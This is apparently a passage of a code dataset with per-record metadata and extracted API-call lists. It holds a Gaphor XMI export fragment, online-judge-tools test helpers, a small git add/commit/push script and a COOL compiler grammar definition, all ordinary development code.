filename = self.file_manager.filename
filename = filename.replace(".gaphor", ".xmi") if filename else "model.xmi"
file_dialog = FileDialog(
gettext("Export model to XMI file"), action="save", filename=filename
)
filename = file_dialog.selection
if filename and len(filename) > 0:
logger.debug(f"Exporting XMI model to: {filename}")
export = exportmodel.XMIExport(self.element_factory)
try:
export.export(filename)
except Exception as e:
logger.error(f"Error while saving model to file {filename}: {e}")
| [((10, 9, 10, 36), 'logging.getLogger', 'logging.getLogger', ({(10, 27, 10, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((31, 12, 31, 47), 'gaphor.core.gettext', 'gettext', ({(31, 20, 31, 46): '"""Export model to XMI file"""'}, {}), "('Export model to XMI file')", False, 'from gaphor.core import action, gettext\n'), ((38, 21, 38, 64), 'gaphor.plugins.xmiexport.exportmodel.XMIExport', 'exportmodel.XMIExport', ({(38, 43, 38, 63): 'self.element_factory'}, {}), '(self.element_factory)', False, 'from gaphor.plugins.xmiexport import exportmodel\n'), ((24, 14, 24, 38), 'gaphor.core.gettext', 'gettext', ({(24, 22, 24, 37): '"""Export to XMI"""'}, {}), "('Export to XMI')", False, 'from gaphor.core import action, gettext\n'), ((25, 16, 25, 77), 'gaphor.core.gettext', 'gettext', ({(25, 24, 25, 76): '"""Export model to XMI (XML Model Interchange) format"""'}, {}), "('Export model to XMI (XML Model Interchange) format')", False, 'from gaphor.core import action, gettext\n')] |
btk15049/online-judge-tools | tests/utils.py | 22505e98359c50df06e7cc1d53a7d253cb096b14 | import contextlib
import os
import pathlib
import subprocess
import sys
import tempfile
@contextlib.contextmanager
def chdir(path):
cwd = os.getcwd()
try:
os.chdir(path)
yield
finally:
os.chdir(cwd)
def prepare_files(files):
for f in files:
path = pathlib.Path(f['path'])
path.parent.mkdir(parents=True, exist_ok=True)
with open(str(path), 'w') as fh:
fh.write(f['data'])
if f.get('executable', False):
path.chmod(0o755)
@contextlib.contextmanager
def sandbox(files):
with tempfile.TemporaryDirectory() as tempdir:
with chdir(tempdir):
prepare_files(files)
yield tempdir
def get_oj_exe():
oj_exe = os.environ.get('TEST_OJ_EXE')
if oj_exe is not None:
return [str(pathlib.Path(oj_exe).resolve())]
else:
return [sys.executable, '-m', 'onlinejudge._implementation.main']
def run(args, *, env=None, check=False, oj_exe=get_oj_exe()):
# oj_exe should be evaluated out of sandboxes
env = env or dict(os.environ)
env['PYTHONPATH'] = str(pathlib.Path(__file__).parent.parent) # this is required to run in sandboxes
return subprocess.run(oj_exe + args, stdout=subprocess.PIPE, stderr=sys.stderr, env=env, check=check)
def run_in_sandbox(args, files):
with sandbox(files) as tempdir:
proc = run(args)
return {
'proc': proc,
'tempdir': tempdir,
}
def cat():
if os.name == 'nt':
return '{} -c "import sys; sys.stdout.buffer.write(sys.stdin.buffer.read())"'.format(sys.executable)
else:
return 'cat'
def sleep_1sec():
if os.name == 'nt':
return '{} -c "import time; time.sleep(1)"'.format(sys.executable)
else:
return 'sleep 1.0'
def python_c(cmd):
assert '"' not in cmd
return '{} -c "{}"'.format(sys.executable, cmd)
def python_script(path):
assert '"' not in path
return '{} "{}"'.format(sys.executable, path)
def is_logged_in(service, memo={}):
# functools.lru_cache is unusable since Service are unhashable
url = service.get_url()
if url not in memo:
proc = run(['login', '--check', url])
memo[url] = proc.returncode == 0
return memo[url]
| [((11, 10, 11, 21), 'os.getcwd', 'os.getcwd', ({}, {}), '()', False, 'import os\n'), ((38, 13, 38, 42), 'os.environ.get', 'os.environ.get', ({(38, 28, 38, 41): '"""TEST_OJ_EXE"""'}, {}), "('TEST_OJ_EXE')", False, 'import os\n'), ((49, 11, 49, 105), 'subprocess.run', 'subprocess.run', (), '', False, 'import subprocess\n'), ((13, 8, 13, 22), 'os.chdir', 'os.chdir', ({(13, 17, 13, 21): 'path'}, {}), '(path)', False, 'import os\n'), ((16, 8, 16, 21), 'os.chdir', 'os.chdir', ({(16, 17, 16, 20): 'cwd'}, {}), '(cwd)', False, 'import os\n'), ((21, 15, 21, 38), 'pathlib.Path', 'pathlib.Path', ({(21, 28, 21, 37): "f['path']"}, {}), "(f['path'])", False, 'import pathlib\n'), ((31, 9, 31, 38), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ({}, {}), '()', False, 'import tempfile\n'), ((48, 28, 48, 50), 'pathlib.Path', 'pathlib.Path', ({(48, 41, 48, 49): '__file__'}, {}), '(__file__)', False, 'import pathlib\n'), ((40, 20, 40, 40), 'pathlib.Path', 'pathlib.Path', ({(40, 33, 40, 39): 'oj_exe'}, {}), '(oj_exe)', False, 'import pathlib\n')] |
zerzerzerz/Computer-Virus | git_operation.py | 4a3125b45e0e4210fb1b8c970a0d6c6bde77f2e8 | import os
commit_string = "选择data的前多少个维度参与训练"
not_add = ['results', 'data', 'weights']
for item in os.listdir():
if item in not_add:
# print(item)
continue
else:
os.system(f"git add {item}")
os.system(f'git commit -m "{commit_string}"')
os.system("git push origin main") | [((5, 12, 5, 24), 'os.listdir', 'os.listdir', ({}, {}), '()', False, 'import os\n'), ((11, 0, 11, 45), 'os.system', 'os.system', ({(11, 10, 11, 44): 'f"""git commit -m "{commit_string}\\""""'}, {}), '(f\'git commit -m "{commit_string}"\')', False, 'import os\n'), ((12, 0, 12, 33), 'os.system', 'os.system', ({(12, 10, 12, 32): '"""git push origin main"""'}, {}), "('git push origin main')", False, 'import os\n'), ((10, 8, 10, 36), 'os.system', 'os.system', ({(10, 18, 10, 35): 'f"""git add {item}"""'}, {}), "(f'git add {item}')", False, 'import os\n')] |
peanut-butter-jellyyy/cool-compiler-2021 | src/cool_grammar.py | 63a668d435ed22cfb8dbb096bc3c82a34f09517b | from src.cmp.pycompiler import Grammar
from src.ast_nodes import (
ProgramNode,
ClassDeclarationNode,
FuncDeclarationNode,
AttrDeclarationNode,
IfNode,
WhileNode,
LetNode,
CaseNode,
IsvoidNode,
AssignNode,
VarDeclarationNode,
CaseItemNode,
NotNode,
LessNode,
LessEqualNode,
EqualNode,
PlusNode,
MinusNode,
StarNode,
DivNode,
NegNode,
InstantiateNode,
BlockNode,
CallNode,
ConstantNumNode,
VariableNode,
BooleanNode,
StringNode,
)
def define_cool_grammar(print_grammar=False):
# grammar
G = Grammar()
# non-terminals
program = G.NonTerminal("<program>", startSymbol=True)
class_list, def_class = G.NonTerminals("<class-list> <def-class>")
feature_list, def_attr, def_func = G.NonTerminals(
"<feature-list> <def-attr> <def-func>"
)
param_list, param = G.NonTerminals("<param-list> <param>")
expr, comp, arith, term, factor, element, atom = G.NonTerminals(
"<expr> <comp> <arith> <term> <factor> <element> <atom>"
)
identifiers_list, identifier_init = G.NonTerminals("<ident-list> <ident-init>")
block, case_block, case_item = G.NonTerminals("<block> <case-block> <case-item>")
func_call, arg_list = G.NonTerminals("<func-call> <arg-list>")
# terminals
classx, inherits, notx, isvoid = G.Terminals("class inherits not isvoid")
let, inx = G.Terminals("let in")
ifx, then, elsex, fi = G.Terminals("if then else fi")
whilex, loop, pool = G.Terminals("while loop pool")
case, of, esac = G.Terminals("case of esac")
semi, colon, comma, dot, opar, cpar, ocur, ccur, at, larrow, rarrow = G.Terminals(
"; : , . ( ) { } @ <- =>"
)
equal, plus, minus, star, div, less, equal, lesseq, neg = G.Terminals(
"= + - * / < = <= ~"
)
idx, num, new, string, true, false = G.Terminals("id int new string true false")
# productions
program %= class_list, lambda h, s: ProgramNode(s[1])
class_list %= def_class + class_list, lambda h, s: [s[1]] + s[2]
class_list %= def_class, lambda h, s: [s[1]]
def_class %= (
classx + idx + ocur + feature_list + ccur + semi,
lambda h, s: ClassDeclarationNode(s[2], s[4]),
)
def_class %= (
classx + idx + inherits + idx + ocur + feature_list + ccur + semi,
lambda h, s: ClassDeclarationNode(s[2], s[6], s[4]),
)
feature_list %= def_attr + semi + feature_list, lambda h, s: [s[1]] + s[3]
feature_list %= def_func + semi + feature_list, lambda h, s: [s[1]] + s[3]
feature_list %= G.Epsilon, lambda h, s: []
def_attr %= (
idx + colon + idx + larrow + expr,
lambda h, s: AttrDeclarationNode(s[1], s[3], s[5]),
)
def_attr %= idx + colon + idx, lambda h, s: AttrDeclarationNode(s[1], s[3])
def_func %= (
idx + opar + param_list + cpar + colon + idx + ocur + expr + ccur,
lambda h, s: FuncDeclarationNode(s[1], s[3], s[6], s[8]),
)
param_list %= param + comma + param_list, lambda h, s: [s[1]] + s[3]
param_list %= param, lambda h, s: [s[1]]
param_list %= G.Epsilon, lambda h, s: []
param %= idx + colon + idx, lambda h, s: (s[1], s[3])
expr %= idx + larrow + expr, lambda h, s: AssignNode(s[1], s[3])
expr %= let + identifiers_list + inx + expr, lambda h, s: LetNode(s[2], s[4])
expr %= (
ifx + expr + then + expr + elsex + expr + fi,
lambda h, s: IfNode(s[2], s[4], s[6]),
)
expr %= whilex + expr + loop + expr + pool, lambda h, s: WhileNode(s[2], s[4])
expr %= case + expr + of + case_block + esac, lambda h, s: CaseNode(s[2], s[4])
expr %= notx + expr, lambda h, s: NotNode(s[2])
expr %= comp, lambda h, s: s[1]
identifiers_list %= (
identifier_init + comma + identifiers_list,
lambda h, s: [s[1]] + s[3],
)
identifiers_list %= identifier_init, lambda h, s: [s[1]]
identifier_init %= (
idx + colon + idx + larrow + expr,
lambda h, s: VarDeclarationNode(s[1], s[3], s[5]),
)
identifier_init %= idx + colon + idx, lambda h, s: VarDeclarationNode(s[1], s[3])
case_block %= case_item + case_block, lambda h, s: [s[1]] + s[2]
case_block %= case_item, lambda h, s: [s[1]]
case_item %= (
idx + colon + idx + rarrow + expr + semi,
lambda h, s: CaseItemNode(s[1], s[3], s[5]),
)
comp %= comp + less + arith, lambda h, s: LessNode(s[1], s[3])
comp %= comp + equal + arith, lambda h, s: EqualNode(s[1], s[3])
comp %= comp + lesseq + arith, lambda h, s: LessEqualNode(s[1], s[3])
comp %= arith, lambda h, s: s[1]
arith %= arith + plus + term, lambda h, s: PlusNode(s[1], s[3])
arith %= arith + minus + term, lambda h, s: MinusNode(s[1], s[3])
arith %= term, lambda h, s: s[1]
term %= term + star + factor, lambda h, s: StarNode(s[1], s[3])
term %= term + div + factor, lambda h, s: DivNode(s[1], s[3])
term %= factor, lambda h, s: s[1]
factor %= isvoid + element, lambda h, s: IsvoidNode(s[2])
factor %= neg + element, lambda h, s: NegNode(s[2])
factor %= new + idx, lambda h, s: InstantiateNode(s[2])
factor %= element, lambda h, s: s[1]
element %= opar + expr + cpar, lambda h, s: s[2]
element %= ocur + block + ccur, lambda h, s: BlockNode(s[2])
element %= (element + dot + func_call, lambda h, s: CallNode(*s[3], obj=s[1]))
element %= (
element + at + idx + dot + func_call,
lambda h, s: CallNode(*s[5], obj=s[1], at_type=s[3]),
)
element %= func_call, lambda h, s: CallNode(*s[1])
element %= atom, lambda h, s: s[1]
atom %= num, lambda h, s: ConstantNumNode(s[1])
atom %= idx, lambda h, s: VariableNode(s[1])
atom %= (
true,
lambda h, s: BooleanNode(s[1]),
)
atom %= false, lambda h, s: BooleanNode(s[1])
atom %= string, lambda h, s: StringNode(s[1])
block %= expr + semi, lambda h, s: [s[1]]
block %= expr + semi + block, lambda h, s: [s[1]] + s[3]
func_call %= idx + opar + arg_list + cpar, lambda h, s: (s[1], s[3])
arg_list %= expr + comma + arg_list, lambda h, s: [s[1]] + s[3]
arg_list %= expr, lambda h, s: [s[1]]
arg_list %= G.Epsilon, lambda h, s: []
if print_grammar:
print(G)
return (G, idx, string, num)
| [((36, 8, 36, 17), 'src.cmp.pycompiler.Grammar', 'Grammar', ({}, {}), '()', False, 'from src.cmp.pycompiler import Grammar\n'), ((67, 40, 67, 57), 'src.ast_nodes.ProgramNode', 'ProgramNode', ({(67, 52, 67, 56): 's[1]'}, {}), '(s[1])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((74, 21, 74, 53), 'src.ast_nodes.ClassDeclarationNode', 'ClassDeclarationNode', ({(74, 42, 74, 46): 's[2]', (74, 48, 74, 52): 's[4]'}, {}), '(s[2], s[4])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((78, 21, 78, 59), 'src.ast_nodes.ClassDeclarationNode', 'ClassDeclarationNode', ({(78, 42, 78, 46): 's[2]', (78, 48, 78, 52): 's[6]', (78, 54, 78, 58): 's[4]'}, {}), '(s[2], s[6], s[4])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((87, 21, 87, 58), 'src.ast_nodes.AttrDeclarationNode', 'AttrDeclarationNode', ({(87, 41, 87, 45): 's[1]', (87, 47, 87, 51): 's[3]', (87, 53, 87, 57): 's[5]'}, {}), '(s[1], s[3], s[5])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((89, 48, 89, 79), 'src.ast_nodes.AttrDeclarationNode', 'AttrDeclarationNode', ({(89, 68, 89, 72): 's[1]', (89, 74, 89, 78): 's[3]'}, {}), '(s[1], s[3])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((93, 21, 93, 64), 'src.ast_nodes.FuncDeclarationNode', 'FuncDeclarationNode', ({(93, 41, 93, 45): 's[1]', (93, 47, 93, 51): 's[3]', (93, 53, 93, 57): 's[6]', (93, 59, 93, 63): 's[8]'}, {}), '(s[1], s[3], s[6], s[8])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((102, 46, 102, 68), 'src.ast_nodes.AssignNode', 'AssignNode', ({(102, 57, 102, 61): 's[1]', (102, 63, 102, 67): 's[3]'}, {}), '(s[1], s[3])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((103, 62, 103, 81), 'src.ast_nodes.LetNode', 'LetNode', ({(103, 70, 103, 74): 's[2]', (103, 76, 103, 80): 's[4]'}, {}), '(s[2], s[4])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((106, 21, 106, 45), 'src.ast_nodes.IfNode', 'IfNode', ({(106, 28, 106, 32): 's[2]', (106, 34, 106, 38): 's[4]', (106, 40, 106, 44): 's[6]'}, {}), '(s[2], s[4], s[6])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((108, 61, 108, 82), 'src.ast_nodes.WhileNode', 'WhileNode', ({(108, 71, 108, 75): 's[2]', (108, 77, 108, 81): 's[4]'}, {}), '(s[2], s[4])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((109, 63, 109, 83), 'src.ast_nodes.CaseNode', 'CaseNode', ({(109, 72, 109, 76): 's[2]', (109, 78, 109, 82): 's[4]'}, {}), '(s[2], s[4])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((110, 38, 110, 51), 'src.ast_nodes.NotNode', 'NotNode', ({(110, 46, 110, 50): 's[2]'}, {}), '(s[2])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((121, 21, 121, 57), 'src.ast_nodes.VarDeclarationNode', 'VarDeclarationNode', ({(121, 40, 121, 44): 's[1]', (121, 46, 121, 50): 's[3]', (121, 52, 121, 56): 's[5]'}, {}), '(s[1], s[3], s[5])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((123, 55, 123, 85), 'src.ast_nodes.VarDeclarationNode', 'VarDeclarationNode', ({(123, 74, 123, 78): 's[1]', (123, 80, 123, 84): 's[3]'}, {}), '(s[1], s[3])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((129, 21, 129, 51), 'src.ast_nodes.CaseItemNode', 'CaseItemNode', ({(129, 34, 129, 38): 's[1]', (129, 40, 129, 44): 's[3]', (129, 46, 129, 50): 's[5]'}, {}), '(s[1], s[3], s[5])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((132, 46, 132, 66), 'src.ast_nodes.LessNode', 'LessNode', ({(132, 55, 132, 59): 's[1]', (132, 61, 132, 65): 's[3]'}, {}), '(s[1], s[3])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((133, 47, 133, 68), 'src.ast_nodes.EqualNode', 'EqualNode', ({(133, 57, 133, 61): 's[1]', (133, 63, 133, 67): 's[3]'}, {}), '(s[1], s[3])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((134, 48, 134, 73), 'src.ast_nodes.LessEqualNode', 'LessEqualNode', ({(134, 62, 134, 66): 's[1]', (134, 68, 134, 72): 's[3]'}, {}), '(s[1], s[3])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((137, 47, 137, 67), 'src.ast_nodes.PlusNode', 'PlusNode', ({(137, 56, 137, 60): 's[1]', (137, 62, 137, 66): 's[3]'}, {}), '(s[1], s[3])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((138, 48, 138, 69), 'src.ast_nodes.MinusNode', 'MinusNode', ({(138, 58, 138, 62): 's[1]', (138, 64, 138, 68): 's[3]'}, {}), '(s[1], s[3])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((141, 47, 141, 67), 'src.ast_nodes.StarNode', 'StarNode', ({(141, 56, 141, 60): 's[1]', (141, 62, 141, 66): 's[3]'}, {}), '(s[1], s[3])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((142, 46, 142, 65), 'src.ast_nodes.DivNode', 'DivNode', ({(142, 54, 142, 58): 's[1]', (142, 60, 142, 64): 's[3]'}, {}), '(s[1], s[3])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((145, 45, 145, 61), 'src.ast_nodes.IsvoidNode', 'IsvoidNode', ({(145, 56, 145, 60): 's[2]'}, {}), '(s[2])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((146, 42, 146, 55), 'src.ast_nodes.NegNode', 'NegNode', ({(146, 50, 146, 54): 's[2]'}, {}), '(s[2])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((147, 38, 147, 59), 'src.ast_nodes.InstantiateNode', 'InstantiateNode', ({(147, 54, 147, 58): 's[2]'}, {}), '(s[2])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((151, 49, 151, 64), 'src.ast_nodes.BlockNode', 'BlockNode', ({(151, 59, 151, 63): 's[2]'}, {}), '(s[2])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((152, 56, 152, 81), 'src.ast_nodes.CallNode', 'CallNode', (), '', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((155, 21, 155, 60), 'src.ast_nodes.CallNode', 'CallNode', (), '', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((157, 39, 157, 54), 'src.ast_nodes.CallNode', 'CallNode', ({(157, 48, 157, 53): '*s[1]'}, {}), '(*s[1])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((160, 30, 160, 51), 'src.ast_nodes.ConstantNumNode', 'ConstantNumNode', ({(160, 46, 160, 50): 's[1]'}, {}), '(s[1])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((161, 30, 161, 48), 'src.ast_nodes.VariableNode', 'VariableNode', ({(161, 43, 161, 47): 's[1]'}, {}), '(s[1])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, 